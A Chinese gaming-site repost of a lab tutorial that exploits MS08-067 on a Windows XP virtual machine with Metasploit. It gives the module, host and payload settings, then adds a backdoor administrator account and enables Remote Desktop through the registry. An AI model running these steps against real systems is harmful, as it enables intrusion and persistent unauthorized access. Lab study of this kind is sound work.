专业游戏门户,分享手游网游单机游戏百科知识攻略!

嗨游网
嗨游网

kalilinux攻击漏洞MS08_067

来源:小嗨整编  作者:小嗨  发布时间:2023-09-12 03:55
摘要:在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境,kalilinux:192.168.116.3winxp192.168.116.116要做的就是用KaliLinux里的Me...

在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境,kalilinux:192.168.116.3 winxp 192.168.116.116 要做的就是用Kali Linux里的Metasploit入侵WinXP

kalilinux攻击漏洞MS08_067

操作方法 01

在Kali用命令 msfconsole 开启Metasploit (在终端里输入msfconsole)

02

然后运行命令: use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序

03

set LHOST 192.168.116.3 #设置本地主机IP

04

set RHOST 192.168.116.116 #设置目标主机IP

05

set payload windows/shell_bind_tcp #设置payload

06

show options#查看设置信息

07

exploit#实施攻击

08

攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。

09

添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况

10

发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

11

有了目标主机的cmdshell你想做什么不行吧?

12

好了演示到此完毕!


本文地址:网络百科频道 https://www.eeeoo.cn/wangluo/1061212.html,嗨游网一个专业手游免费下载攻略知识分享平台,本站部分内容来自网络分享,不对内容负责,如有涉及到您的权益,请联系我们删除,谢谢!


网络百科
小编:小嗨整编
相关文章相关阅读
  • 勒索软件防护要打开吗(勒索软件攻击目的主要是什么)?

    勒索软件防护要打开吗(勒索软件攻击目的主要是什么)?

    勒索软件防护要打开吗(勒索软件攻击目的主要是什么)?如今,数字威胁无处不在,从诱骗你泄露敏感信息的网络钓鱼者到侵入你帐户的黑客。最令人担忧的软件之一是勒索软件,它会加密用户文件或锁定计算机,直到你支付赎金。勒索软件的常见感染方式包括:垃圾邮...

  • dnf女气功自带光属性攻击吗(dnf女气功时装上衣选什么技能)?

    dnf女气功自带光属性攻击吗(dnf女气功时装上衣选什么技能)?

    dnf女气功自带光属性攻击吗(dnf女气功时装上衣选什么技能)?dnf手游中女气功的输出能力不是很强,爆发不太行、续航也不太行,但是和端游差不多,她的辅助能力特别强,再加上有团本专属的增效技能,混团能力嘎嘎行!武器推荐“泰拉石手套”,或50...

  • 魔兽世界自动攻击条怎么移动/怎么关(魔兽世界自动攻击宏命令)?

    魔兽世界自动攻击条怎么移动/怎么关(魔兽世界自动攻击宏命令)?

    魔兽世界自动攻击条怎么移动/怎么关(魔兽世界自动攻击宏命令)?魔兽世界自动攻击条可以用大脚插件管理,下拉插件,然后只有一个选项,就是调整位置,之后鼠标拖动就好。魔兽世界自动攻击条怎么关1、首先按esc打开游戏设置。2、然后点击里面的按键绑定...

  • 什么属于dos攻击

    什么属于dos攻击

    dos具有代表性的攻击手段包括pingofdeath、teardrop、udpflood、synflood、landattack、ipspoofingdos等。dos即拒绝服务,其目的是使计算机或网络无法提供正常的服务。本教程操作环境:wi...

  • 网络钓鱼攻击是什么,如何防范?

    网络钓鱼攻击是什么,如何防范?

    随着互联网的发展,网络钓鱼攻击在网络空间日渐普遍。简而言之,网络钓鱼是一种利用欺骗手段获取个人信息、财务信息和敏感信息的攻击方式。在这篇文章中,我们将探讨网络钓鱼的定义、攻击形式和如何防范此类攻击。网络钓鱼攻击涉及的定义网络钓鱼攻击是指使用...

  • 网络攻击的种类有哪些?

    网络攻击的种类有哪些?

    网络攻击的种类有:1、主动攻击,会导致某些数据流的篡改和虚假数据流的产生;这类攻击可分为篡改、伪造消息数据和终端(拒绝服务)。2、被动攻击,通常包括窃听、流量分析、破解弱加密的数据流等攻击方式。本教程操作环境:Windows10系统、Del...

  • 如何应对勒索病毒攻击?

    如何应对勒索病毒攻击?

    勒索病毒攻击是一种常见的网络安全威胁,它通过加密用户的重要文件或者阻止用户访问计算机系统来勒索赎金。勒索病毒攻击可以给个人和企业带来巨大的损失,因此,我们必须采取正确的措施来防范和应对这种威胁。首先,要定期备份数据。定期备份至少可以减少重要...

  • Nginx的漏洞分析及防范

    Nginx的漏洞分析及防范

    nginx是一款广泛应用于互联网领域的高性能web服务器软件,由于其高效、可靠、安全等优势,已成为许多大型网站和应用程序的首选。但是,和其他软件一样,nginx也不是完美的,存在一些漏洞,给服务器安全带来威胁。因此,本文将对nginx的漏洞...

  • 周排行
  • 月排行
  • 年排行

精彩推荐